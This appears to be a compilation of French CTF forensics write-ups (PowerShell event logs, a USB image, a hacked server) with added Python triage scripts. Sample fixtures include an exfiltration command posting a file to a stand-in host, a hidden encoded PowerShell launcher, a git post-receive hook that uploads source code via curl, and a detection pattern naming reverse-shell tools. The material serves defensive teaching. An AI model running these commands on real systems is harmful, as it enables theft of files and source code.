La gazette de Windows Category: Intro - forensics
Statement: It seems that a user is running suspicious PowerShell scripts on his machine. Fortunately, logging is enabled on this machine and we were able to recover the PowerShell event log. Find what was sent to the attacker.
SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78
Solve: Check the integrity of the log file:

```
sha256sum Microsoft-Windows-PowerShell%4Operational.evtx | grep 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78
770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78  Microsoft-Windows-PowerShell%4Operational.evtx
```

We will use the evtx tool to parse the .evtx file.
Thanks to Abyss W4tcher for his Volatility install script, which allows running Volatility in a Docker container.
Ransomémoire Category: forensics
Ransomémoire 0/3 - Pour commencer Difficulty: ⭐
Statement: You are preparing to analyze a memory capture and you write down some information about the machine before diving into the analysis: username, machine name, browser used. The flag is in the format FCSC{user name:machine name:browser name} where:
Weird Shell Category: forensics
Difficulty: ⭐
Statement: Another user shows behavior similar to the one in La gazette de Windows (intro category). But this time, to find what was sent to the attacker, you may need more logs.
SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
SHA256(Security.evtx) = 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
Solve: We check the integrity of the log files:

```
sha256sum Microsoft-Windows-PowerShell%4Operational.evtx | grep 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc  Microsoft-Windows-PowerShell%4Operational.evtx
sha256sum Security.evtx | grep 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689  Security.
```
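Both La gazette de Windows and Weird Shell come down to the same step once the logs are verified: pull the script text out of the PowerShell Operational log and find the outbound transfer. The script below is an added example, not code from the original write-up. It assumes the log has been converted to JSON lines with the evtx tool (`evtx_dump -o jsonl`), and that each record has the `Event.System.EventID` / `Event.EventData` shape that tool produces; the sample records, the ScriptBlockIds, the `203.0.113.5` host and the file paths are all constructed for the demonstration. It reassembles event 4104 fragments by ScriptBlockId, decodes `-EncodedCommand` payloads (base64 of UTF-16LE), and lists every URL an upload cmdlet targets in any layer.

```python
import base64
import json
import re
import sys
from collections import defaultdict
from typing import Dict, List

# Event 4104 (script block logging) is the record that carries the actual script text.
# Blocks longer than the event size limit are split into MessageNumber/MessageTotal
# fragments that share one ScriptBlockId, so they must be reassembled before searching.
SCRIPT_BLOCK_EVENT = 4104

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Cmdlets and .NET calls commonly used to push data out, followed by the URL they target.
NET_RE = re.compile(
    r"(?:Invoke-WebRequest|Invoke-RestMethod|\biwr|\birm|\bcurl|\bwget|DownloadString|"
    r"UploadString|UploadFile|UploadData)\b[^\n]*?(https?://\S+)", re.I)


def _event_id(system: dict) -> int:
    eid = system.get("EventID")
    if isinstance(eid, dict):  # evtx_dump nests the value when the element carries attributes
        eid = eid.get("#text")
    return int(eid)


def reassemble_script_blocks(jsonl: str) -> Dict[str, str]:
    """ScriptBlockId -> full script text, fragments joined in MessageNumber order."""
    chunks = defaultdict(list)
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)["Event"]
        if _event_id(ev["System"]) != SCRIPT_BLOCK_EVENT:
            continue
        data = ev["EventData"]
        chunks[data["ScriptBlockId"]].append(
            (int(data.get("MessageNumber", 1)), data.get("ScriptBlockText", "")))
    return {sid: "".join(text for _, text in sorted(parts)) for sid, parts in chunks.items()}


def decode_encoded_commands(text: str) -> List[str]:
    """Every -EncodedCommand payload in `text`, decoded back to the original command."""
    out = []
    for b64 in ENC_RE.findall(text):
        try:
            out.append(base64.b64decode(b64).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def analyze(jsonl: str) -> List[dict]:
    """Per script block: decoded -EncodedCommand layers and every outbound URL found in any layer."""
    report = []
    for sid, text in reassemble_script_blocks(jsonl).items():
        layers = [text] + decode_encoded_commands(text)
        urls = [u.rstrip("'\")") for layer in layers for u in NET_RE.findall(layer)]
        report.append({"id": sid, "decoded": layers[1:], "urls": urls})
    return report


# --- constructed sample records (not the challenge's log), in evtx_dump's JSON-lines shape ---
def _record(event_id: int, data: dict) -> str:
    return json.dumps({"Event": {"System": {"EventID": event_id, "Computer": "DESKTOP-01"},
                                 "EventData": data}})


def _encode_command(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


EXFIL_CMD = ("Invoke-WebRequest -Uri http://203.0.113.5/drop -Method POST "
             "-Body (Get-Content C:\\Users\\bob\\secret.txt)")

SAMPLE_JSONL = "\n".join([
    _record(4103, {"Payload": "CommandInvocation(Get-Process)"}),  # pipeline event, ignored
    # two fragments of one block, deliberately logged out of order
    _record(4104, {"MessageNumber": 2, "MessageTotal": 2, "ScriptBlockId": "b1f2",
                   "ScriptBlockText": "-Method POST -Body $payload"}),
    _record(4104, {"MessageNumber": 1, "MessageTotal": 2, "ScriptBlockId": "b1f2",
                   "ScriptBlockText": "$payload = Get-Content C:\\Users\\bob\\notes.txt\n"
                                      "Invoke-RestMethod -Uri http://203.0.113.5/api "}),
    # a launcher that hides the real command behind -enc
    _record(4104, {"MessageNumber": 1, "MessageTotal": 1, "ScriptBlockId": "c3d4",
                   "ScriptBlockText": "powershell.exe -NoP -W Hidden -enc " + _encode_command(EXFIL_CMD)}),
])

if __name__ == "__main__":
    # Real use: evtx_dump -o jsonl Microsoft-Windows-PowerShell%4Operational.evtx > ps.jsonl
    #           python3 this_script.py ps.jsonl
    jsonl = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_JSONL
    for entry in analyze(jsonl):
        print(entry["id"], entry["urls"])
        for layer in entry["decoded"]:
            print("   decoded:", layer)
```

Script block logging only records what PowerShell actually compiled, so a launcher built from 4104 alone tells you the command, not who ran it or when the logon happened; that is what the Security.evtx in Weird Shell is for (correlate on the record's timestamp and logon events).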
The Lost Key Difficulty: Easy
Author: Zeecka
Statement: The USB key of a Norman terrorist has been recovered. Investigate the drive to prevent him from taking action!
Solve:

```
tar xzvf the_lost_key.tar.gz
the_lost_key.img
```

Use file and fdisk to get information about the dump:

```
file the_lost_key.img
the_lost_key.img: DOS/MBR boot sector; partition 1 : ID=0x7, start-CHS (0x4,4,1), end-CHS (0x3ff,254,2), startsector 2048, 3909632 sectors
fdisk -l the_lost_key.
```
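What `file` and `fdisk` print above is read straight from the 64-byte partition table at offset 446 of sector 0. The parser below is an added example, not code from the write-up: it decodes the four MBR entries, recovers the same fields as `file` (type 0x07, CHS tuples, start sector, sector count), and turns the start sector into the byte offset a read-only loop mount needs. The sample MBR it builds is constructed to match the `file` output above, and the 512-byte sector size is an assumption to confirm against `fdisk -l` before trusting the offset.

```python
import struct
from typing import List, NamedTuple, Tuple

SECTOR_SIZE = 512  # assumed logical sector size; check "Sector size" in fdisk -l


class Partition(NamedTuple):
    index: int                        # 1-based slot in the MBR table
    bootable: bool                    # status byte 0x80
    type_id: int                      # 0x07 = NTFS/exFAT/HPFS, 0x83 = Linux, ...
    start_chs: Tuple[int, int, int]   # (cylinder, head, sector), as `file` prints them
    end_chs: Tuple[int, int, int]
    lba_start: int                    # first sector of the partition
    sector_count: int

    @property
    def byte_offset(self) -> int:
        return self.lba_start * SECTOR_SIZE

    @property
    def byte_size(self) -> int:
        return self.sector_count * SECTOR_SIZE


def _decode_chs(raw: bytes) -> Tuple[int, int, int]:
    # Legacy CHS packing: byte0 = head, byte1 = sector (bits 0-5) + cylinder bits 8-9 (bits 6-7),
    # byte2 = cylinder bits 0-7. Modern tools ignore it and use the LBA fields.
    head = raw[0]
    sector = raw[1] & 0x3F
    cylinder = ((raw[1] & 0xC0) << 2) | raw[2]
    return (cylinder, head, sector)


def parse_mbr(sector0: bytes) -> List[Partition]:
    """Parse the four primary partition entries from the first 512 bytes of an image."""
    if len(sector0) < 512 or sector0[510:512] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature: not a DOS/MBR boot sector")
    parts = []
    for i in range(4):
        entry = sector0[446 + 16 * i: 446 + 16 * (i + 1)]
        status, chs_s, ptype, chs_e, lba, count = struct.unpack("<B3sB3sII", entry)
        if ptype == 0 or count == 0:  # empty slot
            continue
        parts.append(Partition(i + 1, status == 0x80, ptype,
                               _decode_chs(chs_s), _decode_chs(chs_e), lba, count))
    return parts


def parse_image(path: str) -> List[Partition]:
    with open(path, "rb") as fh:
        return parse_mbr(fh.read(512))


def mount_command(image: str, part: Partition, target: str = "/mnt/tmp") -> str:
    """Read-only loop mount of one partition without carving it out of the image."""
    return (f"sudo mount -o ro,loop,offset={part.byte_offset},"
            f"sizelimit={part.byte_size} {image} {target}")


# --- constructed sample: an MBR whose single entry matches the `file` output above ---
def _encode_chs(cylinder: int, head: int, sector: int) -> bytes:
    return bytes([head, (sector & 0x3F) | (((cylinder >> 8) & 0x3) << 6), cylinder & 0xFF])


def build_sample_mbr() -> bytes:
    entry = struct.pack("<B3sB3sII", 0x00, _encode_chs(0x4, 4, 1), 0x07,
                        _encode_chs(0x3FF, 254, 2), 2048, 3909632)
    return bytes(446) + entry + bytes(16 * 3) + b"\x55\xAA"


if __name__ == "__main__":
    for p in parse_mbr(build_sample_mbr()):
        print(f"partition {p.index}: type=0x{p.type_id:02x} start={p.lba_start} "
              f"sectors={p.sector_count} offset={p.byte_offset} bytes")
        print(mount_command("the_lost_key.img", p))
```

For a type 0x07 partition the loop mount still needs an NTFS driver (ntfs-3g or the in-kernel ntfs3), and `ro` keeps the evidence untouched; `losetup -P` on the whole image is the other common way to get per-partition devices without computing offsets by hand.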
Pas Un Bon Nom Difficulty: Easy
Statement: I was just chilling on my PC, you see? Downloading movies and stuff, you see? And then there's this weird message saying I have to pay Dogecoin to decrypt my data. I didn't do it... so now my data is encrypted :( So here, take the hard drive, it's not like it's of any use now... Unless it were possible to recover the key used by this nasty hacker, you see?
Vivre pas cher Difficulty: Medium
Statement: Our server has been hacked. That much is obvious. They keep leaking our source code, as soon as we update it. You must find the origin of this backdoor as soon as possible. Annie Massion, Postal Services
Solve: Mount the image:

```
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 cheap-life.img
sudo mount -o ro,noload /dev/nbd1p1 /mnt/tmp
```

(`-r` exports the image read-only and `noload` skips journal replay, so nothing is written back to the evidence.)

Solve 1: We are looking for a backdoor:
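With the root filesystem mounted read-only, the first pass is a sweep of the places a "leaks our code every time we update it" backdoor usually lives: scheduled jobs, login scripts, git hooks that fire on every push, and setuid binaries. The triage script below is an added example, not the write-up's own solution; it runs against any mount point passed to it (paths are taken relative to the mount so the host's own `/etc` is never scanned) and, to run stand-alone, builds a constructed mini tree whose hook, crontab and `203.0.113.5` host are invented for the demonstration.

```python
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# Persistence locations worth a first look on a mounted Linux root (relative to the mount point).
PERSISTENCE = [
    "etc/crontab", "etc/cron.d", "etc/cron.hourly", "etc/cron.daily",
    "var/spool/cron", "var/spool/cron/crontabs", "etc/rc.local",
    "etc/systemd/system", "etc/profile.d", "root/.bashrc", "root/.ssh/authorized_keys",
]
# Strings that turn "a script that runs" into "a script that talks to someone".
IOC_RE = re.compile(r"(https?://|/dev/tcp/|\bcurl\b|\bwget\b|\bnc\b|\bncat\b|bash -i|base64 -d)")


def _iocs(path: Path) -> List[str]:
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return []
    return [line.strip() for line in text.splitlines() if IOC_RE.search(line)]


def scan(root: str) -> List[Dict[str, object]]:
    """Suspicious files under `root`: persistence entries, live git hooks, setuid/setgid binaries."""
    root_p = Path(root)
    findings: List[Dict[str, object]] = []

    def add(kind: str, p: Path) -> None:
        findings.append({"kind": kind, "path": p.relative_to(root_p).as_posix(), "iocs": _iocs(p)})

    for rel in PERSISTENCE:
        p = root_p / rel
        if p.is_file():
            add("persistence-file", p)
        elif p.is_dir():
            for child in sorted(p.iterdir()):
                if child.is_file():
                    add("persistence-file", child)

    for dirpath, _dirs, files in os.walk(root_p):
        d = Path(dirpath)
        # .git/hooks (working tree) or <repo>.git/hooks (bare repo): both have HEAD one level up.
        is_hook_dir = d.name == "hooks" and (d.parent / "HEAD").is_file()
        for name in files:
            fp = d / name
            if is_hook_dir and not name.endswith(".sample"):  # .sample hooks never run
                add("git-hook", fp)
            try:
                mode = fp.lstat().st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                add("setuid-setgid", fp)
    return findings


def build_fixture() -> str:
    """Constructed mini root tree standing in for the mounted image (not the challenge's files)."""
    root = Path(tempfile.mkdtemp(prefix="cheap-life-"))
    (root / "srv/repo.git/hooks").mkdir(parents=True)
    (root / "srv/repo.git/HEAD").write_text("ref: refs/heads/master\n")
    (root / "srv/repo.git/hooks/pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")
    (root / "srv/repo.git/hooks/post-receive").write_text(
        "#!/bin/sh\ngit archive HEAD | curl -s -F 'src=@-' http://203.0.113.5/leak\n")
    (root / "etc").mkdir()
    (root / "etc/crontab").write_text("0 * * * * root /usr/local/bin/backup.sh\n")
    return str(root)


if __name__ == "__main__":
    # Real use: scan("/mnt/tmp") after the qemu-nbd mount above.
    for f in scan(build_fixture()):
        print(f"[{f['kind']}] {f['path']}")
        for line in f["iocs"]:
            print("    ", line)
```

A server-side git hook such as `post-receive` is a natural fit for the symptom described in the statement, since it runs on the server with every push; the mtimes of whatever this sweep flags, compared against the repository's own history, usually narrow down when the backdoor was planted.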